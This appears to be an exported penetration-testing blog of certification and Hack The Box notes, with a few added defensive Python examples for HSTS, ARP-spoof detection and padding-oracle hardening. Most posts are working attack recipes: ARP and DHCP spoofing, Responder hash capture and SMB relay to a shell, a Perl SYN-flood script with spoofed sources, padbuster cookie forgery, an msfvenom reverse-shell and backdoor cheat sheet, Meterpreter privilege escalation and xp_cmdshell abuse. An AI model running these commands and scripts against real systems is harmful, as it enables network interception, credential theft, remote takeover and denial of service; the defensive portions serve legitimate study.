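

def evaluate_hsts(headers: Dict[str, str], min_max_age: int = ONE_YEAR) -> List[str]:
    """Return a list of weaknesses; an empty list means the policy closes the downgrade window."""
    lower = {k.lower(): v for k, v in headers.items()}     # header names are case-insensitive
    value = lower.get("strict-transport-security")
    if value is None:
        return ["Strict-Transport-Security header absent: a stripped HTTP session is never upgraded"]
    d = parse_hsts(value)
    problems: List[str] = []
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        problems.append("max-age directive missing or not numeric")
    elif int(max_age) == 0:
        problems.append("max-age=0 removes the policy from the browser")
    elif int(max_age) < min_max_age:
        problems.append(f"max-age {max_age} is below the {min_max_age} second minimum")
    if "includesubdomains" not in d:
        problems.append("includeSubDomains missing: subdomains remain downgradable")
    if "preload" not in d:
        problems.append("preload missing: the very first visit is still trust-on-first-use")
    return problems


if __name__ == "__main__":
    for label, headers in (("good", GOOD_HEADERS), ("missing", MISSING_HEADERS), ("weak", WEAK_HEADERS)):
        print(label, evaluate_hsts(headers) or ["ok"])
```

Even a correct header only takes effect after the browser has seen it once over HTTPS, which is why the check treats a missing `preload` directive as a finding: without preloading, the very first HTTP request is exactly the window sslstrip needs.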

Friday, July 17, 2020

[eCPPT][MITM]Bettercap to launch ARP POISONING

Installation:
# apt-get update
# apt-get install bettercap

Execution:
# sysctl net.ipv4.ip_forward=1
# bettercap -iface wlan0

Tweaking:
The help command shows the status of the modules:
>> help
Use "MODULE_NAME on/off" to enable or disable a specific module:
>> arp.spoof on
>> net.sniff off

ARP Poisoning:
>> net.recon on
>> net.sniff on
>> arp.spoof on

Thursday, July 16, 2020

[eCPPT][MITM][Spoofing][Poisoning]LAN-Based Man In The Middle Attacks

1) MAC Flooding

Most current switches can store 100,000,000 MAC addresses each, so the following command attempts to fill the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches each can store a great quantity of MAC addresses.

Countermeasure:
- Port Security to limit the number of PCs connecting to each port
- IEEE 802.1x requiring connected PCs to forcibly authenticate their identities
- MAC Filtering only allowing authorized MAC addresses to communicate


2) ARP Poisoning

In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then use Wireshark to capture the confidential information passing through.

More details can be found in the following two posts:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html

Countermeasure:
- Encryption In Transit and At Rest to withstand Man In The Middle and Interception
- Applying Static ARP to networks
- Use switch features such as Cisco DHCP Snooping and Dynamic ARP Inspection
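The countermeasures above assume you can tell a poisoning attempt apart from normal traffic. The Python example below is added here (not from the original post) to show the two signals a detector or a NIDS rule looks for in captured ARP replies: an IP-to-MAC binding that changes, and one MAC that claims the gateway together with other hosts, which is exactly the pattern `arpspoof -t VICTIM -r GATEWAY` produces. The capture `TRACE`, the MAC addresses and the gateway `192.168.0.1` are constructed; the optional `static_table` models the "static ARP" countermeasure, whose entries are never overwritten by what is seen on the wire.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class ArpReply:
    ts: float   # seconds since the start of the capture
    ip: str     # sender protocol address (the IP being claimed)
    mac: str    # sender hardware address (the MAC claiming it)


GATEWAY_IP = "192.168.0.1"

# Constructed capture. The first three replies are the legitimate hosts; from
# t=5.0 a third MAC (an attacker running arpspoof) claims both the gateway and
# the victim 192.168.0.7, so traffic in both directions flows through it.
TRACE = [
    ArpReply(0.0, "192.168.0.1", "aa:bb:cc:00:00:01"),
    ArpReply(0.5, "192.168.0.7", "aa:bb:cc:00:00:07"),
    ArpReply(1.0, "192.168.0.9", "aa:bb:cc:00:00:09"),
    ArpReply(5.0, "192.168.0.1", "00:0c:29:11:22:33"),
    ArpReply(5.0, "192.168.0.7", "00:0c:29:11:22:33"),
    ArpReply(6.0, "192.168.0.1", "00:0c:29:11:22:33"),
]

Alert = Tuple[float, str, str]   # (timestamp, severity, message)


def detect_arp_spoof(trace: List[ArpReply], gateway_ip: str,
                     static_table: Optional[Dict[str, str]] = None) -> List[Alert]:
    """Flag an IP rebinding to a new MAC, and one MAC claiming the gateway plus other hosts."""
    static = {ip: mac.lower() for ip, mac in (static_table or {}).items()}
    bindings: Dict[str, str] = dict(static)              # ip -> mac currently believed
    claims: Dict[str, Set[str]] = defaultdict(set)       # mac -> every ip it has claimed
    alerts: List[Alert] = []
    reported: Set[str] = set()

    def report(ts: float, severity: str, message: str) -> None:
        if message not in reported:            # one alert per distinct finding
            reported.add(message)
            alerts.append((ts, severity, message))

    for reply in trace:
        mac = reply.mac.lower()
        known = bindings.get(reply.ip)
        if known is None:
            bindings[reply.ip] = mac           # first sighting: learn it
        elif known != mac:
            severity = "critical" if reply.ip == gateway_ip else "high"
            report(reply.ts, severity, f"{reply.ip} moved from {known} to {mac}")
            if reply.ip not in static:         # a static entry is never overwritten
                bindings[reply.ip] = mac
        claims[mac].add(reply.ip)
        if gateway_ip in claims[mac] and len(claims[mac]) > 1:
            others = ", ".join(sorted(claims[mac] - {gateway_ip}))
            report(reply.ts, "critical", f"{mac} claims the gateway {gateway_ip} and {others}")
    return alerts


if __name__ == "__main__":
    for ts, severity, message in detect_arp_spoof(TRACE, GATEWAY_IP):
        print(f"t={ts:4.1f} {severity:8s} {message}")
```

Dynamic ARP Inspection does the same comparison in the switch, against the DHCP snooping binding table instead of a learned one; the learned version above is what a host-based agent or an arpwatch-style sensor can do without switch support.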


3) DHCP Spoofing

Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Leverage the following steps to launch DHCP Starvation attack in order to exhaust the authorized DHCP server:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing the ENTER button to launch DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget to turn off the firewall, if any.

Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-like systems to monitor for DHCP Starvation attacks


4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)

Scenario #1:
When someone in the same Windows domain mistypes a hostname that does not exist, the following command captures the name-resolution request and answers it with a fake response in order to obtain that user's username and password hash.
[Attacker Kali PC:]
# responder -I eth0
After gaining the username and hash:
# cd /usr/share/responder/logs
Apply john the ripper to the case as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt

Scenario #2:
If the PCs in the Windows network use WPAD to configure their proxy settings, the WPAD listener can be enabled to trick their users into typing their passwords, so the attacker obtains the passwords without cracking anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb

Scenario #3:
Responder's MultiRelay function can be applied when SMB Signing is disabled on the victim's PC.
[Attacker Kali PC:]
First determine if SMB Signing settings on the victim is disabled:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit responder.conf and turn off SMB and HTTP services:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 -u ALL

Countermeasure:
- Enable SMB Signing

Friday, July 10, 2020

[eCPPT][snmp]SNMP Hacking

[Server:]
For the server side, install an SNMP daemon through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd


[Hacker:]
Confirm if the remote SNMP is working properly:
# nmap -sU -sV -n -p 161 192.168.0.253

Check what NMAP scripts could be used to get further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root  7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root  4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root  5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root  5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root  4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root  4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root  1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root  2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root  2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root  4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root  2003 Mar 10 12:52 snmp-win32-users.nse

Brute Force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253

Try the default community string, "public", by SNMP walking:
# snmpwalk -v 2c 192.168.0.253 -c public

Get a clearer picture of the target's settings via SNMP:
# snmp-check 192.168.0.253 -c public

Check an OID and modify it:
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"

Wednesday, July 8, 2020

[eCPPT]SMB and RPC enumeration and mounting

Enumeration:
#enum4linux 192.168.0.191
#nbtstat -v 192.168.0.191
#rpcclient -N -U "" 192.168.0.191

Mount share drives:
#mount.cifs //192.168.0.191/C /media/C_share/ -o user=,pass=
#smbclient \\\\192.168.0.191\\C "welcome20XX" -U "TempUser"

Audit Linux command line

1) The script and scriptplay commands
tecmint@tecmint ~ $ script --timing=time.txt script.log
Script started, file is script.log
tecmint@tecmint ~ $ exit
Script done, file is script.log
tecmint@tecmint ~ $ scriptreplay --timing=time.txt script.log


2) The trap command:
$ trap 'echo "$USER":"$BASH_COMMAND" >>/path/to/log' DEBUG
$ uname
Linux
$ pwd
/home/dessert
$ hostname
dessert’s plowhorse
$ ls
dir1 file1 file2
$
$
$ bahs
No command 'bahs' found, did you mean:
 Command 'bash' from package 'bash' (main)
 Command 'bats' from package 'bats' (universe)
bahs: command not found
$ cat /path/to/log
dessert:uname
dessert:pwd
dessert:hostname
dessert:ls --color=auto
dessert:bahs
dessert:cat /path/to/log

Monday, July 6, 2020

[eCPPT][nmap]Scanning techniques for Firewall/IDS Evasion

1) Fragmentation
Utilize the parameters "-sS -f", such as:
#nmap -sS -f 192.168.0.1
This technique is obsolete, since nearly all modern NIDSs detect this kind of scanning.

2) Decoy
Use the parameters "-sS -D" to present several bogus IP addresses as additional scanners and confuse security analysts.
#nmap -sS -D 192.168.0.3,192.168.0.5,192.168.0.7,ME,192.168.0.11 192.168.0.251

3) Prolong the interval among scan requests
Apply "-T0" (5 minutes between probes) or "-T1" (15 seconds between probes) to the scan in order to hide the scanning activity.
#nmap -sS -p 25,80,443 -T0 192.168.0.1

4) Set Scanning Source Port as Famous Service Port
Change the source port of the scanning probes to a well-known service port (e.g. 25, 80, or 443) by using the parameter "-g".
#nmap -sS -g 25 192.168.0.1
#nmap -sU -g 53 192.168.0.251

5) Idle Scan
Use a zombie to scan the target host by leveraging the parameter "-sI".
First, determine whether a host (e.g. 192.168.0.251) can be a zombie:
#nmap -O -v -n 192.168.0.251
Second, if the zombie host is confirmed to be usable, use it to scan the target host (e.g. 192.168.0.253):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253

Saturday, July 4, 2020

[nmap]syn_flood_through_nmap.pl

#!/usr/bin/perl -w
$|=1;

sub randomip(){
@digits = ();
for (0..3) {
push @digits, int (rand (255) + 1);
}
return join '.', @digits;
}
#print randomip(); #DEBUG

sub check_nmap(){
$result = sprintf(`which nmap`);
if(length($result)==0){
die "Please install Nmap.\n";
}
return;
}


&check_nmap();
print("Target IP address (e.g. 192.168.0.1): ");
$target_ip=<STDIN>;
chop($target_ip);
print("Target TCP port (e.g. 25): ");
$target_port=<STDIN>;
chop($target_port);
print("Network Interface sending out SYN (e.g. eth0): ");
$network_adapter=<STDIN>;
chop($network_adapter);


print("Launching SYN Flood...");

while(1){
$src_ip = &randomip();
system("nmap -e $network_adapter -Pn -sS -T5 -p $target_port -S $src_ip $target_ip");
}

exit(1);

Thursday, July 2, 2020

[eCPPT][nmap]Confirm if a remote machine can be used as a zombie

#nmap -O -v -n 192.168.0.1
OR (when you already know which remote TCP port is open, TCP 135 in the following example):
#nmap -O -v -n -p 135 10.50.97.10

The following line in the output shows that the machine can be a zombie for Nmap's Idle Scan:
IP ID Sequence Generation: Incremental

Monday, June 29, 2020

[eCPPT][DNS]DNS Reconnaissance

DNS Dumpster (https://dnsdumpster.com/)
DNS Enumerate (#dnsenum --subfile /root/report.txt -v -f /usr/share/dnsenum/dns.txt -u a -r microsoft.com)

Saturday, June 27, 2020

[eCPPT]DNS Reverse Lookup Tool

https://hackertarget.com/reverse-dns-lookup/

https://dnslytics.com/reverse-ip

https://reverseip.domaintools.com/

https://www.robtex.com/

[eCPPT][DNS]The dig command in Linux

General Lookup:
#dig TARGET +short
Example:
#dig microsoft.com +short

PTR (reverse) Lookup:
#dig -x IP_ADDRESS
Example:
#dig -x 8.8.4.4

MX Lookup:
#dig TARGET MX
Example:
#dig microsoft.com MX

NS Lookup:
#dig TARGET NS
Example:
#dig microsoft.com NS

Zone Transfer:
#dig @SERVER TARGET -t AXFR +nocookie
Example:
#dig @10.50.96.5 foocampus.com -t AXFR +nocookie

Wednesday, June 24, 2020

[eCPPT][Pentest][Threat Intelligence]Search Engines for reconnaissance

Gov-related:
SAM Database (www.sam.gov)

Job Posting:
LinkedIn (www.linkedin.com)
Indeed (www.indeed.com)
Monster (www.monster.com)
CareerBuilder (www.careerbuilder.com)
Glassdoor (www.glassdoor.com)
Simplyhired (www.simplyhired.com)
Dice (www.dice.com)

Finance Section:
CrunchBase (www.crunchbase.com)
Inc. (www.inc.com)
Google Finance (finance.google.com)
EDGAR (www.sec.gov/edgar.shtml)
Yahoo Finance (finance.yahoo.com)

File-related:
Download document files from the target before using FOCA to analyze them.

Harvester:
#theHarvester -d microsoft.com -s -v -e 8.8.4.4 -n -c -b all

Archive:
WayBackMachine (archive.org)

Sunday, June 14, 2020

[eCPPT]Change Windows password through Kali Live CD

1) Import SAM by the chntpw command:
#chntpw -i /media/XXXX/WINDOWS/system32/config/SAM

2) Use the popup interactive user interface to change the password.

Thursday, May 28, 2020

[HTB]Tools for CTF

Port Scan:
#nmap -sS -A -p- -T4 IP
#nmap -sS --script vuln -p Ports IP

Vulnerability Scan:
OpenVAS

Web Scan:
dirb
Dirbuster
Yyj-websprider
Paros
Burp Suite
Sqlmap

Exploitation:
msfconsole
meterpreter
exploitdb / searchsploit

Backdoor:
msfvenom
msfconsole handler

[HTB][meterpreter][msfconsole][metasploit]Migrate the process in Meterpreter

meterpreter > ps
 ...
 2660  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2732  604   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.

Sunday, May 24, 2020

[HTB]An example of Padding Oracle Attack

1) Obtain the suspicious cookie. In this case, the cookie is:
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy

2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------

3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
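Added example in Python (not from the original post): the decrypted HEX above is "user=aaa" followed by eight 0x08 bytes, i.e. PKCS#7 padding for the block size of 8 that padbuster was given. The code interprets that value, shows the server-side shape that leaks the oracle (distinguishable padding and format errors), and the pattern that closes it: an HMAC over the ciphertext, verified in constant time before any decryption or unpadding, so a tampered cookie gets one uniform rejection. The MAC key and the sample tokens are constructed; the cipher itself is out of scope and would sit between open_sealed() and pkcs7_unpad().

```python
import base64
import hashlib
import hmac

BLOCK_SIZE = 8  # padbuster was run with block size 8 above

# "Decrypted value (HEX)" reported by padbuster above: "user=aaa" + 8 bytes of 0x08
DECRYPTED_HEX = "757365723D6161610808080808080808"


def padding_oracle_unpad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """The vulnerable shape: padding errors and format errors are distinguishable.

    A server that turns these two exceptions into different responses (status
    code, error page or timing) is the oracle that padbuster drives byte by byte.
    """
    if not data or not 1 <= data[-1] <= block_size:
        raise ValueError("bad padding")
    pad = data[-1]
    if data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding")
    body = data[:-pad]
    if not body.startswith(b"user="):
        raise KeyError("unknown cookie format")
    return body


def oracle_response(data: bytes) -> str:
    """What a vulnerable endpoint effectively tells the client for a decrypted block."""
    try:
        padding_oracle_unpad(data)
    except ValueError:
        return "HTTP 500 (bad padding)"
    except KeyError:
        return "HTTP 200 (valid padding, unknown user)"
    return "HTTP 200 (logged in)"


def pkcs7_unpad(data: bytes, block_size: int = BLOCK_SIZE):
    """Strip PKCS#7 padding, returning None for any invalid padding.

    Every padding byte is checked without an early exit and there is a single
    failure value, so the caller learns nothing about which byte was wrong.
    """
    if not data or len(data) % block_size:
        return None
    pad = data[-1]
    if not 1 <= pad <= block_size:
        return None
    bad = 0
    for b in data[-pad:]:
        bad |= b ^ pad
    return None if bad else data[:-pad]


def seal(ciphertext: bytes, mac_key: bytes) -> str:
    """Encrypt-then-MAC envelope: base64url(ciphertext || HMAC-SHA256(ciphertext))."""
    tag = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(ciphertext + tag).decode()


def open_sealed(token: str, mac_key: bytes):
    """Return the ciphertext only when its tag verifies, otherwise None.

    The tag is compared in constant time before the bytes reach any decryption
    or unpadding code, so a client that flips ciphertext bytes (which is all a
    padding-oracle attack does) gets one uniform rejection.
    """
    try:
        blob = base64.urlsafe_b64decode(token.encode())
    except ValueError:  # binascii.Error is a ValueError
        return None
    if len(blob) < 32:  # SHA-256 tag length
        return None
    ct, tag = blob[:-32], blob[-32:]
    expected = hmac.new(mac_key, ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return ct


if __name__ == "__main__":
    block = bytes.fromhex(DECRYPTED_HEX)
    print("plaintext:", pkcs7_unpad(block))
    print("oracle says:", oracle_response(block))
    key = b"constructed-mac-key"  # constructed; never hard-code a real key
    print("sealed token:", seal(block, key))
```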

Saturday, May 23, 2020

[HTB][msfvenom][metasploit]Msfvenom Cheat Sheet

#Copied from https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/


MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.


Binaries
Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple HTTP Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho Creates a simple TCP Shell for Mac
msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk Creates a simple TCP Payload for Android


Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php Creates a Simple TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp Creates a Simple TCP Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp Creates a Simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war Creates a Simple TCP Shell for WAR


PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php


Windows Payloads
Command Info
msfvenom -l encoders Lists all available encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Binds an exe with a Payload (Backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > example.exe Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe > example.exe Binds an exe with a Payload and encodes it


How do I get the meterpreter shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run

Thursday, May 21, 2020

[HTB][meterpreter][msfconsole]Find Privilege Escalation exploits through Metasploit

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > background

msf > search local_exploit

msf > use 0

msf > set session 1

msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Wednesday, May 20, 2020

[HTB][meterpreter][msfconsole]A walkthrough of Privilege Escalation in Windows

meterpreter > getuid
Neither Administrator nor SYSTEM

meterpreter > cd %TEMP%

meterpreter > background

msf > use exploit/windows/local/ms10_015_kitrap0d

msf > set session 2

msf > set lhost 10.10.XX.XX

msf > run

msf > sessions -i 2

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Tuesday, May 19, 2020

[HTB] Some usage of smbclient

# smbclient -N -L \\\\10.10.10.XXX\\
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"

Thursday, May 14, 2020

[HTB]Knock down MS SQL Server through xp_cmdshell

Assume that a username/password pair has already been obtained:
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER ('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> reconfigure;
SQL> xp_cmdshell "whoami"

[HTB]Listing and accessing remote shares through smbclient

Show remote shares:
# smbclient -N -L \\\\192.168.0.100

After all shares are listed, pick one and access it:
# smbclient -N \\\\192.168.0.100\\share1

Show content in the share:
smb: \> dir

Download a file from the share:
smb: \> get aaa.txt

[HTB]Auto Scan through NMAP

#!/bin/bash
echo "TARGET IP:"
read -r ip
# Full-range sweep first, collecting the open ports as a comma-separated list
ports=$(nmap -p- --min-rate=1000 -T4 "$ip" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
[ -n "$ports" ] || { echo "No open ports found on $ip"; exit 1; }
# Script and version scan restricted to the ports found above
nmap -sC -sV -p"$ports" "$ip"

Wednesday, May 13, 2020

[HTB]POST HTTP data through Command Line

Example:
# curl -d "param1=value1&param2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data

POST verb without any data:
#  curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate

Thursday, May 7, 2020

[eJPT][nmap]Apply Nmap to Synflood

Command:
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"

-e wlan0: Specify the network adapter that sends the packets.
-Pn: Skip the ping (host discovery) step before launching the scan.
-T5: The fastest timing template.
-S 192.168.0.253: Spoof the packet source as 192.168.0.253.
192.168.0.251: The target.
The watch command relaunches the nmap scan every 10 seconds.

Monday, May 4, 2020

[eJPT][spider]A script for crawling websites as Web Grep

#!/usr/bin/perl -w
#This script is named by YYJ, who is my friend and a smart lady.
#It is used for CTF and written by demonalex.
use strict;
use Cwd;
$|=1;
my $original_dir = getcwd;

# Random 8-letter working directory under /tmp
my $folder = "";
for (0..7) { $folder .= chr( int(rand(25) + 65) ); }
#print "$folder\n";
system("mkdir", "-p", "/tmp/$folder") == 0 or die "Cannot create /tmp/$folder\n";
chdir "/tmp/$folder" or die "Cannot enter /tmp/$folder: $!\n";

print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
my $target_url = <STDIN> // "";
chomp($target_url);
if($target_url eq ""){
    die("Target URL is not defined!\n");
}
print("Maximum Recursion Depth (Default: 5): ");
my $mrd = <STDIN> // "";
chomp($mrd);
if($mrd !~ /^\d+$/){
    $mrd=5;
}
print("Keyword (Default: password): ");
my $keyword = <STDIN> // "";
chomp($keyword);
if($keyword eq ""){
    $keyword="password";
}

=pod
print("\$target_url : $target_url\n");
print("\$mrd: $mrd\n");
print("\$keyword: $keyword\n");
=cut

# Mirror the site into the working directory, then grep the mirrored files for the keyword.
# The list form of system() hands each argument over directly, so user input is never parsed by a shell.
system("wget", "-q", "-r", "-l", $mrd, $target_url);
print("----------------------------------------\n");
system("grep", "-nR", "-i", $keyword, ".");

chdir $original_dir;
system("rm", "-Rf", "/tmp/$folder");
exit(0);

Sunday, May 3, 2020

[eJPT]Crack MS SQL Server

The main idea is shown below:
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload


1) Obtain a username/password pair and verify that it works by using Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33

2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run

3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run

4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
